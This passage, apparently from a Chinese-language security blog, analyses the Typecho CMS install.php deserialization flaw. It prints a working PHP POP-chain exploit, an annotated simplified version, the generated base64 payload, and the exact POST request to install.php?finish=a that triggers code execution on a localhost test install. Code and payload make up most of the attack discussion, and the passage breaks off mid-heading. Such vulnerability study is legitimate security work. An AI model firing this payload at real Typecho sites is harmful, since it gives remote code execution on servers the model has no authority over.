class="hljs-meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>&#x8FD9;&#x91CC;&#x8C03;&#x7528;&#x4E86;get&#x65B9;&#x6CD5;&#xFF0C;&#x7EE7;&#x7EED;&#x67E5;&#x627E;&#xFF1A;</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">&lt;?php</span></span><br><span class="line">    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">get</span><span class="hljs-params">($key, $default = NULL)</span></span></span><br><span class="line"><span class="hljs-function">    </span>{</span><br><span class="line">        <span class="hljs-keyword">switch</span> (<span class="hljs-keyword">true</span>) {</span><br><span class="line">            <span class="hljs-keyword">case</span> <span class="hljs-keyword">isset</span>(<span class="hljs-keyword">$this</span>-&gt;_params[$key]):</span><br><span class="line">                $value = <span class="hljs-keyword">$this</span>-&gt;_params[$key];</span><br><span class="line">                <span class="hljs-keyword">break</span>;</span><br><span class="line">            <span class="hljs-keyword">case</span> <span class="hljs-keyword">isset</span>(<span class="hljs-keyword">self</span>::$_httpParams[$key]):</span><br><span class="line">                $value = <span class="hljs-keyword">self</span>::$_httpParams[$key];</span><br><span class="line">                <span class="hljs-keyword">break</span>;</span><br><span class="line">            <span class="hljs-keyword">default</span>:</span><br><span class="line">                $value = $default;</span><br><span class="line">                <span class="hljs-keyword">break</span>;</span><br><span class="line">        }</span><br><span class="line"></span><br><span class="line">        $value = !is_array($value) &amp;&amp; strlen($value) &gt; <span class="hljs-number">0</span> ? $value : $default;</span><br><span class="line">        <span class="hljs-keyword">return</span> <span class="hljs-keyword">$this</span>-&gt;_applyFilter($value);</span><br><span class="line">    }</span><br><span class="line"><span class="hljs-meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>&#x8FD9;&#x6BB5;&#x4EE3;&#x7801;&#x4E2D;&#xFF0C;<em>$value = $this-&gt;_params[$key];</em>&#x53EF;&#x77E5;&#xFF0C;value&#x53D8;&#x91CF;&#x7684;&#x503C;&#x7531;<em>$this-&gt;_params</em>&#x63D0;&#x4F9B;&#xFF0C;&#x5728;&#x6700;&#x540E;&#x53C8;&#x6267;&#x884C;&#x4E86;<em>$this-&gt;_applyFilter($value);</em> &#x7EE7;&#x7EED;&#x67E5;&#x627E;applyFilter()&#x65B9;&#x6CD5;&#x3002;</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">&lt;?php</span></span><br><span class="line">    <span class="hljs-keyword">private</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">_applyFilter</span><span class="hljs-params">($value)</span></span></span><br><span class="line"><span class="hljs-function">    </span>{</span><br><span class="line">        <span class="hljs-keyword">if</span> (<span class="hljs-keyword">$this</span>-&gt;_filter) {</span><br><span class="line">            <span class="hljs-keyword">foreach</span> (<span class="hljs-keyword">$this</span>-&gt;_filter <span class="hljs-keyword">as</span> $filter) {</span><br><span class="line">                $value = is_array($value) ? array_map($filter, $value) :</span><br><span class="line">                call_user_func($filter, $value);</span><br><span class="line">            }</span><br><span class="line"></span><br><span class="line">            <span class="hljs-keyword">$this</span>-&gt;_filter = <span class="hljs-keyword">array</span>();</span><br><span class="line">        }</span><br><span class="line"></span><br><span class="line">        <span class="hljs-keyword">return</span> $value;</span><br><span class="line">    }</span><br><span class="line"><span class="hljs-meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>&#x5728;&#x8FD9;&#x91CC;&#x5B58;&#x5728;&#x4E24;&#x4E2A;&#x53CD;&#x8C03;&#x51FD;&#x6570;&#xFF1A;&#x5206;&#x522B;&#x4E3A;&#xFF1A;array_map(),call_user_func().</p>
<ol>
<li>call_user_func()&#xFF08;&#x628A;&#x7B2C;&#x4E00;&#x4E2A;&#x53C2;&#x6570;&#x4F5C;&#x4E3A;&#x56DE;&#x8C03;&#x51FD;&#x6570;&#x8C03;&#x7528;&#xFF09;</li>
<li>array_map()&#xFF08;&#x51FD;&#x6570;&#x5C06;&#x7528;&#x6237;&#x81EA;&#x5B9A;&#x4E49;&#x51FD;&#x6570;&#x4F5C;&#x7528;&#x5230;&#x6570;&#x7EC4;&#x4E2D;&#x7684;&#x6BCF;&#x4E2A;&#x503C;&#x4E0A;&#xFF0C;&#x5E76;&#x8FD4;&#x56DE;&#x7528;&#x6237;&#x81EA;&#x5B9A;&#x4E49;&#x51FD;&#x6570;&#x4F5C;&#x7528;&#x540E;&#x7684;&#x5E26;&#x6709;&#x65B0;&#x503C;&#x7684;&#x6570;&#x7EC4;&#x3002;&#xFF09;</li>
</ol>
<p>&#x8FD9;&#x4E24;&#x4E2A;&#x51FD;&#x6570;&#x90FD;&#x662F;&#x4F5C;&#x4E3A;&#x53EF;&#x4EE5;&#x6267;&#x884C;&#x4EE3;&#x7801;&#x7684;&#x51FD;&#x6570;&#xFF0C;&#x5E76;&#x4E14;$filter&#x4E0E;$value&#x7684;&#x503C;&#x53EF;&#x4EE5;&#x901A;&#x8FC7;&#x53CD;&#x5E8F;&#x5217;&#x5316;&#x95F4;&#x63A5;&#x63A7;&#x5236;&#x3002;</p>
<h3 id="&#x9644;&#x4E0A;&#x7F51;&#x7EDC;&#x4E0A;&#x7684;EXP&#xFF1A;"><a href="#&#x9644;&#x4E0A;&#x7F51;&#x7EDC;&#x4E0A;&#x7684;EXP&#xFF1A;" class="headerlink" title="&#x9644;&#x4E0A;&#x7F51;&#x7EDC;&#x4E0A;&#x7684;EXP&#xFF1A;"></a>&#x9644;&#x4E0A;&#x7F51;&#x7EDC;&#x4E0A;&#x7684;EXP&#xFF1A;</h3><pre><code>&lt;?php
class Typecho_Request
{
    private $_params = array();
    private $_filter = array();

    public function __construct()
    {
        // $this-&gt;_params[&apos;screenName&apos;] = &apos;whoami&apos;;
        $this-&gt;_params[&apos;screenName&apos;] = -1;
        $this-&gt;_filter[0] = &apos;phpinfo&apos;;
    }
}

class Typecho_Feed
{
    const RSS2 = &apos;RSS 2.0&apos;;
    /** &#x5B9A;&#x4E49;ATOM 1.0&#x7C7B;&#x578B; */
    const ATOM1 = &apos;ATOM 1.0&apos;;
    /** &#x5B9A;&#x4E49;RSS&#x65F6;&#x95F4;&#x683C;&#x5F0F; */
    const DATE_RFC822 = &apos;r&apos;;
    /** &#x5B9A;&#x4E49;ATOM&#x65F6;&#x95F4;&#x683C;&#x5F0F; */
    const DATE_W3CDTF = &apos;c&apos;;
    /** &#x5B9A;&#x4E49;&#x884C;&#x7ED3;&#x675F;&#x7B26; */
    const EOL = &quot;\n&quot;;
    private $_type;
    private $_items = array();
    public $dateFormat;

    public function __construct()
    {
        $this-&gt;_type = self::RSS2;
        $item[&apos;link&apos;] = &apos;1&apos;;
        $item[&apos;title&apos;] = &apos;2&apos;;
        $item[&apos;date&apos;] = 1507720298;
        $item[&apos;author&apos;] = new Typecho_Request();
        $item[&apos;category&apos;] = array(new Typecho_Request());

        $this-&gt;_items[0] = $item;
    }
}

$x = new Typecho_Feed();
$a = array(
    &apos;host&apos; =&gt; &apos;localhost&apos;,
    &apos;user&apos; =&gt; &apos;xxxxxx&apos;,
    &apos;charset&apos; =&gt; &apos;utf8&apos;,
    &apos;port&apos; =&gt; &apos;3306&apos;,
    &apos;database&apos; =&gt; &apos;typecho&apos;,
    &apos;adapter&apos; =&gt; $x,
    &apos;prefix&apos; =&gt; &apos;typecho_&apos;
);
echo urlencode(base64_encode(serialize($a)));
?&gt;

&#x751F;&#x6210;&#x7684;payload&#x4E3A;&#xFF1A;YTo3OntzOjQ6Imhvc3QiO3M6OToibG9jYWxob3N0IjtzOjQ6InVzZXIiO3M6NjoieHh4eHh4IjtzOjc6ImNoYXJzZXQiO3M6NDoidXRmOCI7czo0OiJwb3J0IjtzOjQ6IjMzMDYiO3M6ODoiZGF0YWJhc2UiO3M6NzoidHlwZWNobyI7czo3OiJhZGFwdGVyIjtPOjEyOiJUeXBlY2hvX0ZlZWQiOjM6e3M6MTk6IgBUeXBlY2hvX0ZlZWQAX3R5cGUiO3M6NzoiUlNTIDIuMCI7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6NTp7czo0OiJsaW5rIjtzOjE6IjEiO3M6NToidGl0bGUiO3M6MToiMiI7czo0OiJkYXRlIjtpOjE1MDc3MjAyOTg7czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO2k6LTE7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo3OiJwaHBpbmZvIjt9fXM6ODoiY2F0ZWdvcnkiO2E6MTp7aTowO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO2k6LTE7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo3OiJwaHBpbmZvIjt9fX19fXM6MTA6ImRhdGVGb3JtYXQiO047fXM6NjoicHJlZml4IjtzOjg6InR5cGVjaG9fIjt9
</code></pre><h3 id="EXP&#x5206;&#x6790;"><a href="#EXP&#x5206;&#x6790;" class="headerlink" title="EXP&#x5206;&#x6790;"></a>EXP&#x5206;&#x6790;</h3><p>&#x4E0A;&#x9762;&#x7684;exp&#x662F;&#x4E00;&#x4E2A;&#x5927;&#x795E;&#x5199;&#x7684;&#xFF0C;&#x4E0B;&#x9762;&#x7684;&#x5206;&#x6790;&#x662F;&#x57FA;&#x4E8E;&#x5B83;&#x7684;exp&#x7136;&#x540E;&#x5220;&#x51CF;&#x4E86;&#x4E00;&#x4E9B;&#x6CA1;&#x6709;&#x5FC5;&#x8981;&#x7684;&#x3002; &#x53EA;&#x4F5C;&#x7B80;&#x5355;&#x7684;&#x5206;&#x6790;&#x3002;</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Typecho_Request</span></span>{</span><br><span class="line">    <span class="hljs-keyword">private</span> $_params = <span class="hljs-keyword">array</span>();				<span class="hljs-comment">//&#x8981;&#x95F4;&#x63A5;&#x63A7;&#x5236;_filter[0]&#x7684;&#x503C;&#xFF0C;&#x9700;&#x8981;&#x5B9A;&#x4E49;&#x8FD9;&#x4E24;&#x4E2A;&#x6570;&#x7EC4;&#xFF01;</span></span><br><span class="line">    <span class="hljs-keyword">private</span> $_filter = <span class="hljs-keyword">array</span>();</span><br><span class="line">	<span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span><span class="hljs-params">()</span></span>{</span><br><span class="line">        <span class="hljs-keyword">$this</span>-&gt;_params[<span class="hljs-string">&apos;screenName&apos;</span>] = <span class="hljs-number">1</span>;	<span class="hljs-comment">//&#x4F1A;&#x5224;&#x65AD;&#x4ED6;&#x662F;&#x5426;&#x88AB;&#x5B9A;&#x4E49;&#xFF0C;&#x5982;&#x679C;&#x8D4B;&#x4E88;0&#xFF0C;&#x5219;&#x4F1A;&#x51FA;&#x9519;&#x3002;&#x6240;&#x4EE5;&#x8FD9;&#x91CC;&#x7684;&#x503C;&#x53EA;&#x8981;&#x4E0D;&#x4E3A;0&#x90FD;&#x884C;&#xFF01;</span></span><br><span class="line">        <span class="hljs-comment">//&#x8FD9;&#x91CC;&#x7684;&#x6570;&#x7EC4;&#x7D22;&#x5F15;&#x5FC5;&#x987B;&#x662F;screenName&#xFF0C;&#x56E0;&#x4E3A;&#x89E6;&#x53D1;__get()&#x65B9;&#x6CD5;&#x662F;&#x7531;&#x4E8E;&#x8C03;&#x7528;&#x4E86;screenName&#x5C5E;&#x6027;&#xFF0C;&#x8FD9;&#x91CC;&#x7684;screenName&#x6B63;&#x662F;&#x8C03;&#x7528;&#x5C5E;&#x6027;&#x65F6;&#x5019;&#x8D4B;&#x4E88;&#x7ED9;get()&#x7684;&#x503C;&#x5373;$key&#x7684;&#x503C;</span></span><br><span class="line">        <span class="hljs-keyword">$this</span>-&gt;_filter[<span class="hljs-number">0</span>] = <span class="hljs-string">&apos;echo &quot;fuckkkkkk!!!&quot;&apos;</span>;	<span class="hljs-comment">//&#x6709;&#x4E00;&#x4E2A;foreach&#x547D;&#x4EE4;&#xFF0C;&#x4F1A;&#x5C06;$this-&gt;_filter[0]&#x8FDB;&#x884C;call_user_func(),&#x5E76;&#x5C06;&#x503C;&#x4F5C;&#x4E3A;&#x51FD;&#x6570;&#x8FD0;&#x884C;&#x3002;&#x5373;&#x5229;&#x7528;&#x4EE3;&#x7801;&#xFF01;</span></span><br><span class="line">	}</span><br><span class="line">}</span><br><span class="line"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Typecho_Feed</span></span>{</span><br><span class="line"></span><br><span class="line">	<span class="hljs-comment">/** &#x5B9A;&#x4E49;RSS 2.0&#x7C7B;&#x578B; */</span></span><br><span class="line">    <span class="hljs-keyword">const</span> RSS2 = <span class="hljs-string">&apos;RSS 2.0&apos;</span>;   <span class="hljs-comment">//&#x9875;&#x9762;&#x91CC;&#x9762;&#x6709;&#x4E2A;if&#x547D;&#x4EE4;&#xFF0C;&#x540E;&#x9762;&#x7684;$this-&gt;_type&#x9700;&#x8981;&#x548C;&#x8FD9;&#x4E2A;&#x76F8;&#x7B49;&#xFF0C;&#x624D;&#x80FD;&#x6267;&#x884C;&#x5230;&#x8C03;&#x7528;screenName&#x7684;&#x5730;&#x65B9;&#xFF01;</span></span><br><span class="line">	<span class="hljs-keyword">private</span> $_type;</span><br><span class="line">	<span class="hljs-keyword">private</span> $_items = <span class="hljs-keyword">array</span>();</span><br><span class="line">	<span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span><span class="hljs-params">()</span></span>{</span><br><span class="line">		<span class="hljs-keyword">$this</span>-&gt;_type = <span class="hljs-keyword">self</span>::RSS2;  <span class="hljs-comment">//self&#x662F;&#x5F15;&#x7528;&#x9759;&#x6001;&#x7C7B;&#x7684;&#x7C7B;&#x540D;&#xFF0C;&#x800C;$this&#x662F;&#x5F15;&#x7528;&#x975E;&#x9759;&#x6001;&#x7C7B;&#x7684;&#x5B9E;&#x4F8B;&#x540D;&#x3002;    &#x5728;&#x8FD9;&#x91CC;&#x5C06;RSS2&#x7684;&#x503C;&#x8D4B;&#x503C;&#x7ED9;$this-&gt;_type&#x3002;</span></span><br><span class="line"></span><br><span class="line">	    $item[<span class="hljs-string">&apos;link&apos;</span>] = <span class="hljs-string">&apos;1&apos;</span>;</span><br><span class="line">	    $item[<span class="hljs-string">&apos;title&apos;</span>] = <span class="hljs-string">&apos;2&apos;</span>;</span><br><span class="line">	    $item[<span class="hljs-string">&apos;date&apos;</span>] = <span class="hljs-number">1507720298</span>;</span><br><span class="line">	    $item[<span class="hljs-string">&apos;author&apos;</span>] = <span class="hljs-keyword">new</span> Typecho_Request();			<span class="hljs-comment">//&apos;author&apos;&#x91CC;&#x9762;&#x5305;&#x542B;&#x7684;&#x5BF9;&#x8C61;&#xFF0C;&#x6CA1;&#x6709;sreenName&#x5C5E;&#x6027;&#x624D;&#x80FD;&#x51FA;&#x53D1;_get()&#x9B54;&#x672F;&#x65B9;&#x6CD5;&#x3002;</span></span><br><span class="line">	    $item[<span class="hljs-string">&apos;category&apos;</span>] = <span class="hljs-keyword">array</span>(<span class="hljs-keyword">new</span> Typecho_Request());	<span class="hljs-comment">//&#x770B;&#x5230;&#x4E00;&#x7BC7;&#x6587;&#x7AE0;&#x8BF4;&#x8FD9;&#x6761;&#x4E5F;&#x662F;&#x53EF;&#x4EE5;&#x7701;&#x7565;&#x7684;&#xFF0C;&#x539F;&#x8BDD;&#x662F;&#xFF1A;&#x201C;&apos;category&apos; &#x7528;&#x4E8E;&#x5206;&#x652F;&#x5904;&#x7406;&#xFF0C;&#x5982;&#x679C;&#x4E0D;&#x7528;&#x4E8E;&#x56DE;&#x663E;&#x6570;&#x636E;&#xFF0C;&#x6B64;&#x5B57;&#x6BB5;&#x53EF;&#x4EE5;&#x7701;&#x7565;&#x201D;&#x4F46;&#x662F;&#x7701;&#x7565;&#x4E86;&#x4E4B;&#x540E;&#x548C;&#x4E0A;&#x9762;link&#x7B49;&#x533B;&#x9662;&#x7684;&#x4F1A;&#x62A5;&#x9519;&#x3002;&#xFF01;</span></span><br><span class="line">	    <span class="hljs-comment">//&#x5206;&#x6790;&#x4E0D;&#x5230;&#x8FD9;&#x4E2A;&#x5730;&#x65B9;&#xFF0C;&#x5E76;&#x4E0D;&#x6E05;&#x695A;&#x8FD9;&#x4E2A;&#x5730;&#x65B9;link&#xFF0C;title&#xFF0C;date&#x662F;&#x627E;&#x5230;&#x9700;&#x8981;&#x88AB;&#x8D4B;&#x4E88;&#x7684;&#x503C;&#x7684;&#xFF0C;&#x7F3A;&#x5C11;&#x4E00;&#x4E2A;&#x90FD;&#x4E0D;&#x884C;&#xFF0C;&#x9875;&#x9762;&#x90FD;&#x663E;&#x793A;&#x9519;&#x8BEF;&#x3002;</span></span><br><span class="line">	    <span class="hljs-keyword">$this</span>-&gt;_items[<span class="hljs-number">0</span>] = $item;</span><br><span class="line">	}</span><br><span class="line">}</span><br><span class="line">$a = <span class="hljs-keyword">new</span> Typecho_Feed();		<span class="hljs-comment">//&#x8FD9;&#x91CC;&#x5B9E;&#x4F8B;&#x4E86;Typecho_Feed()&#x5BF9;&#x8C61;&#x3002;</span></span><br><span class="line">$exp = <span class="hljs-keyword">array</span>(</span><br><span class="line">    <span class="hljs-string">&apos;adapter&apos;</span> =&gt; $a,			<span class="hljs-comment">//&#x8FD9;&#x91CC;&#x5C06;adapter&#x8BBE;&#x7F6E;&#x4E3A;&#x4E00;&#x4E2A;&#x5BF9;&#x8C61;&#xFF0C;&#x624D;&#x80FD;&#x51FA;&#x53D1;__toString()&#x9B54;&#x672F;&#x65B9;&#x6CD5;&#x3002;</span></span><br><span class="line">    <span class="hljs-string">&apos;prefix&apos;</span> =&gt; <span class="hljs-string">&apos;typecho_&apos;</span>		<span class="hljs-comment">//&#x8FD9;&#x91CC;&#x7701;&#x7565;&#x4E5F;&#x53EF;&#x4EE5;&#x8FD0;&#x884C;phpinfo&#xFF0C;&#x4F46;&#x662F;PHP&#x4F1A;&#x62A5;&#x9519;&#x3002;</span></span><br><span class="line">);</span><br><span class="line"><span class="hljs-keyword">echo</span> base64_encode(serialize($exp));</span><br><span class="line"><span class="hljs-meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h3 id="&#x5229;&#x7528;&#x8FC7;&#x7A0B;&#xFF1A;"><a href="#&#x5229;&#x7528;&#x8FC7;&#x7A0B;&#xFF1A;" class="headerlink" title="&#x5229;&#x7528;&#x8FC7;&#x7A0B;&#xFF1A;"></a>&#x5229;&#x7528;&#x8FC7;&#x7A0B;&#xFF1A;</h3><pre><code>&#x5728;&#x706B;&#x72D0;&#x6D4F;&#x89C8;&#x5668;&#x6253;&#x5F00;&#xFF1A;http://localhost/install.php
&#x6253;&#x5F00;HackBar&#xFF1A;
&#x7F51;&#x5740;&#x4E3A;&#xFF1A;http://localhost/install.php?finish=a
POST&#x5185;&#x5BB9;&#x4E3A;&#xFF1A;__typecho_config=YTo3OntzOjQ6Imhvc3QiO3M6OToibG9jYWxob3N0IjtzOjQ6InVzZXIiO3M6NjoieHh4eHh4IjtzOjc6ImNoYXJzZXQiO3M6NDoidXRmOCI7czo0OiJwb3J0IjtzOjQ6IjMzMDYiO3M6ODoiZGF0YWJhc2UiO3M6NzoidHlwZWNobyI7czo3OiJhZGFwdGVyIjtPOjEyOiJUeXBlY2hvX0ZlZWQiOjM6e3M6MTk6IgBUeXBlY2hvX0ZlZWQAX3R5cGUiO3M6NzoiUlNTIDIuMCI7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6NTp7czo0OiJsaW5rIjtzOjE6IjEiO3M6NToidGl0bGUiO3M6MToiMiI7czo0OiJkYXRlIjtpOjE1MDc3MjAyOTg7czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO2k6LTE7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo3OiJwaHBpbmZvIjt9fXM6ODoiY2F0ZWdvcnkiO2E6MTp7aTowO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO2k6LTE7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo3OiJwaHBpbmZvIjt9fX19fXM6MTA6ImRhdGVGb3JtYXQiO047fXM6NjoicHJlZml4IjtzOjg6InR5cGVjaG9fIjt9
Referrer=http://localhost/install.php
&#x53D1;&#x9001;POST&#x5373;&#x53EF;&#x770B;&#x5230;&#x7F51;&#x9875;&#x6267;&#x884C;&#x4E86;&lt;?php phpinfo(); ?&gt; &#x5373;&#x6F0F;&#x6D1E;&#x5229;&#x7528;&#x6210;&#x529F;&#xFF01;
</code></pre><h3 id="&#x53C2;&#x8003;"><a href="#&#x53C2;&#x8003;" class="headerlink" title="&#x53C2;&#x8003;"></a>&#x53C2;&#x8003;</h3><ol>
<li><a href="https://www.freebuf.com/vuls/152058.html" target="_blank" rel="noopener">https://www.freebuf.com/vuls/152058.html</a></li>
<li><a href="https://www.freebuf.com/vuls/155753.html" target="_blank" rel="noopener">https://www.freebuf.com/vuls/155753.html</a></li>
<li><a href="https://paper.seebug.org/424/" target="_blank" rel="noopener">https://paper.seebug.org/424/</a></li>
<li><a href="http://www.blogsir.com.cn/safe/454.html" target="_blank" rel="noopener">http://www.blogsir.com.cn/safe/454.html</a> //&#x4ECA;&#x5929;&#x7A81;&#x7136;&#x6253;&#x4E0D;&#x5F00;&#x4E86;&#x3002;</li>
<li><a href="http://www.blogsir.com.cn/safe/452.html" target="_blank" rel="noopener">POP&#x94FE;&#x548C;&#x5E8F;&#x5217;&#x5316;&#xFF0C;&#x53CD;&#x5E8F;&#x5217;&#x5316;&#x64CD;&#x4F5C; - rivir-&#x6C5F;sir</a> //&#x4E5F;&#x662F;&#x6253;&#x4E0D;&#x5F00;&#xFF01;</li>
</ol>
<h3 id="&#x5176;&#x4ED6;"><a href="#&#x5176;&#x4ED6;" class="headerlink" title="&#x5176;&#x4ED6;"></a>&#x5176;&#x4ED6;</h3><h4 id="call-user-func-&#xFF08;&#x628A;&#x7B2C;&#x4E00;&#x4E2A;&#x53C2;&#x6570;&#x4F5C;&#x4E3A;&#x56DE;&#x8C03;&#x51FD;&#x6570;&#x8C03;&#x7528;&#xFF09;"><a href="#call-user-func-&#xFF08;&#x628A;&#x7B2C;&#x4E00;&#x4E2A;&#x53C2;&#x6570;&#x4F5C;&#x4E3A;&#x56DE;&#x8C03;&#x51FD;&#x6570;&#x8C03;&#x7528;&#xFF09;" class="headerlink" title="call_user_func &#xFF08;&#x628A;&#x7B2C;&#x4E00;&#x4E2A;&#x53C2;&#x6570;&#x4F5C;&#x4E3A;&#x56DE;&#x8C03;&#x51FD;&#x6570;&#x8C03;&#x7528;&#xFF09;"></a>call_user_func &#xFF08;&#x628A;&#x7B2C;&#x4E00;&#x4E2A;&#x53C2;&#x6570;&#x4F5C;&#x4E3A;&#x56DE;&#x8C03;&#x51FD;&#x6570;&#x8C03;&#x7528;&#xFF09;</h4><pre><code>&lt;?php 
    function barber($type){                                    //&#x5B9A;&#x4E49;&#x4E00;&#x4E2A;&#x51FD;&#x6570;barber
        echo &quot;you wanted a $type haircut, no problem\n&quot;;
    }
    call_user_func(&apos;barber&apos;,&apos;mushroom&apos;);                    //&#x5C06;&#x51FD;&#x6570;barber&#x7684;&#x51FD;&#x6570;&#x540D;&#x4F5C;&#x4E3A;&#x4E00;&#x4E2A;&#x53C2;&#x6570;&#xFF01;&#x540E;&#x9762;&#x4E3A;&#x8F93;&#x5165;&#x7684;&#x503C;&#xFF01;
?&gt;
&#x901A;&#x8FC7;&#x7C7B;&#x540D;&#x3001;&#x5BF9;&#x8C61;&#x7684;&#x65B9;&#x5F0F;&#x56DE;&#x8C03;
&lt;?php 
    /**
     * &#x7528;call_user_func()&#x6765;&#x8C03;&#x7528;&#x4E00;&#x4E2A;&#x7C7B;&#x91CC;&#x9762;&#x7684;&#x65B9;&#x6CD5;
     */
    class myclass{                            //&#x5B9A;&#x4E49;&#x4E00;&#x4E2A;&#x7C7B;
        static function say_hello(){        //&#x5728;&#x7C7B;&#x4E2D;&#x5B9A;&#x4E49;&#x4E00;&#x4E2A;&#x51FD;&#x6570;
            echo &quot;hello!\n&quot;;
        }
    }
    $classname = &quot;myclass&quot;;
    //&#x901A;&#x8FC7;&#x6570;&#x7EC4;&#x952E;&#x503C;&#x7684;&#x65B9;&#x5F0F;&#xFF0C;&#x5BF9;&#x7C7B;&#x540D;&#x8FDB;&#x884C;&#x56DE;&#x8C03;&#xFF0C;&#x56DE;&#x8C03;&#x7C7B;&#x540D;&#x91CC;&#x9762;&#x7684;&#xFF0C;say_hello&#x65B9;&#x6CD5;
    call_user_func(array($classname,&apos;say_hello&apos;));

    //&#x901A;&#x8FC7;&#x7C7B;&#x540D;&#x76F4;&#x63A5;&#x8C03;&#x7528;&#x9759;&#x6001;&#x65B9;&#x6CD5;
    call_user_func($classname .&apos;::say_hello&apos;); // As of 5.2.3// $myobject = new myclass();

    //&#x901A;&#x8FC7;&#x5BF9;&#x8C61;&#x7684;&#x65B9;&#x5F0F;&#x56DE;&#x8C03;
    $myobject = new myclass();
    call_user_func(array($myobject, &apos;say_hello&apos;));
?&gt;
</code></pre><h4 id="array-map-&#xFF08;&#x51FD;&#x6570;&#x5C06;&#x7528;&#x6237;&#x81EA;&#x5B9A;&#x4E49;&#x51FD;&#x6570;&#x4F5C;&#x7528;&#x5230;&#x6570;&#x7EC4;&#x4E2D;&#x7684;&#x6BCF;&#x4E2A;&#x503C;&#x4E0A;&#xFF0C;&#x5E76;&#x8FD4;&#x56DE;&#x7528;&#x6237;&#x81EA;&#x5B9A;&#x4E49;&#x51FD;&#x6570;&#x4F5C;&#x7528;&#x540E;&#x7684;&#x5E26;&#x6709;&#x65B0;&#x503C;&#x7684;&#x6570;&#x7EC4;&#x3002;&#xFF09;"><a href="#array-map-&#xFF08;&#x51FD;&#x6570;&#x5C06;&#x7528;&#x6237;&#x81EA;&#x5B9A;&#x4E49;&#x51FD;&#x6570;&#x4F5C;&#x7528;&#x5230;&#x6570;&#x7EC4;&#x4E2D;&#x7684;&#x6BCF;&#x4E2A;&#x503C;&#x4E0A;&#xFF0C;&#x5E76;&#x8FD4;&#x56DE;&#x7528;&#x6237;&#x81EA;&#x5B9A;&#x4E49;&#x51FD;&#x6570;&#x4F5C;&#x7528;&#x540E;&#x7684;&#x5E26;&#x6709;&#x65B0;&#x503C;&#x7684;&#x6570;&#x7EC4;&#x3002;&#xFF09;" class="headerlink" title="array_map() 